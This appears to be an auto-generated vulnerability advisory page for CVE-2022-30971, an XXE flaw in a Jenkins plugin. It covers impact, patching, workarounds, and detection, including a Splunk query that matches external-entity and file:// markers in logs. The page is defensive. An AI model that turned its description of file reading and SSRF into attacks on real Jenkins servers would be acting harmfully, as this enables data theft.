CVE-2022-30971 – CVE-2022-30971 is an XML external entity (XXE) ... (How to Fix)

Q: What is the severity of CVE-2022-30971?

CVE-2022-30971 has a CVSS score of 8.8 (HIGH). CVE-2022-30971 is an XML external entity (XXE) vulnerability in the Jenkins Storable Configs Plugin, allowing attackers to read arbitrary files from the Jenkins controller server or perform server-side request forgery (SSRF). It affects users of Jenkins with this plugin installed, particularly those who can configure jobs or have access to plugin functionality, potentially leading to sensitive data exposure or further attacks.

📋 TL;DR

CVE-2022-30971 is an XML external entity (XXE) vulnerability in the Jenkins Storable Configs Plugin, allowing attackers to read arbitrary files from the Jenkins controller server or perform server-side request forgery (SSRF). It affects users of Jenkins with this plugin installed, particularly those who can configure jobs or have access to plugin functionality, potentially leading to sensitive data exposure or further attacks.

💻 Affected Systems

Products:

Jenkins Storable Configs Plugin

Versions: 1.0 and earlier

Operating Systems: All operating systems where Jenkins runs (e.g., Linux, Windows, macOS)

Default Config Vulnerable: ⚠️ Yes

Notes: The vulnerability is present in default configurations of the plugin; no special setup is required for exploitation.

📦 What is this software?

Storable Configs by Jenkins

View all CVEs affecting Storable Configs →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Exploitation could allow an attacker to read sensitive files (e.g., credentials, configuration files) from the Jenkins server, perform SSRF to internal systems, or cause denial of service, potentially leading to full system compromise.

🟠

Likely Case

In most scenarios, attackers with access to Jenkins (e.g., authenticated users) could exploit this to exfiltrate data or probe internal networks, resulting in data breaches or lateral movement.

🟢

If Mitigated

With proper network segmentation and access controls, impact may be limited to isolated data exposure without escalation to critical systems.

🌐 Internet-Facing: HIGH, as internet-facing Jenkins instances are directly accessible, increasing the attack surface for exploitation by external actors.

🏢 Internal Only: MEDIUM, as internal attackers with network access could still exploit it, but requires some level of authentication or insider threat.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation typically requires some level of access to Jenkins (e.g., ability to configure jobs or use plugin features), but tools and scripts are available, making attacks straightforward for knowledgeable attackers.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Version 1.1 or later of the Jenkins Storable Configs Plugin

Vendor Advisory: https://www.jenkins.io/security/advisory/2022-05-17/#SECURITY-1969

Restart Required: Yes

Instructions:

1. Update the Jenkins Storable Configs Plugin to version 1.1 or later via the Jenkins Plugin Manager. 2. Restart the Jenkins service to apply the changes. 3. Verify the update by checking the plugin version in the Jenkins interface.

🔧 Temporary Workarounds

Disable or Remove the Plugin

all

Temporarily mitigate the risk by disabling or uninstalling the vulnerable plugin if not essential.

Navigate to Jenkins > Manage Jenkins > Plugin Manager, find 'Storable Configs Plugin', and click 'Disable' or 'Uninstall'.

Restrict Access to Jenkins

linux

Limit network access to Jenkins to trusted IPs and enforce strong authentication to reduce attack surface.

Configure firewall rules (e.g., using iptables on Linux: 'sudo iptables -A INPUT -p tcp --dport 8080 -s TRUSTED_IP -j ACCEPT') and enable authentication in Jenkins settings.

🧯 If You Can't Patch

Implement network segmentation to isolate Jenkins from sensitive systems and monitor for unusual file access attempts.
Apply strict access controls and audit logs to detect and respond to exploitation attempts quickly.

🔍 How to Verify

Check if Vulnerable:

Check the installed version of the Storable Configs Plugin in Jenkins: Go to Manage Jenkins > Plugin Manager, search for 'Storable Configs', and verify if version is 1.0 or earlier.

Check Version:

On Jenkins server, you can check via CLI: 'java -jar jenkins-cli.jar -s http://localhost:8080/ list-plugins | grep storable-configs' (requires Jenkins CLI setup).

Verify Fix Applied:

After updating, confirm the plugin version is 1.1 or later in the Plugin Manager and test functionality to ensure no regression.

📡 Detection & Monitoring

Log Indicators:

Look for unusual XML parsing errors or file read attempts in Jenkins logs (e.g., 'jenkins.log' entries with XXE-related warnings or external entity references).

Network Indicators:

Monitor for unexpected outbound connections from Jenkins to internal systems or external domains, which may indicate SSRF activity.

SIEM Query:

Example query for Splunk: 'index=jenkins_logs sourcetype=jenkins ("XXE" OR "external entity" OR "file://") | stats count by host'

📊 Metadata

CVE ID: CVE-2022-30971

CVSS v3 Score: 8.8 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-611

Published: May 17, 2022

Last Updated: November 21, 2024

🔗 References

https://www.jenkins.io/security/advisory/2022-05-17/#SECURITY-1969 Vendor Advisory
https://www.jenkins.io/security/advisory/2022-05-17/#SECURITY-1969 Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2022-30971, you might also want to check these: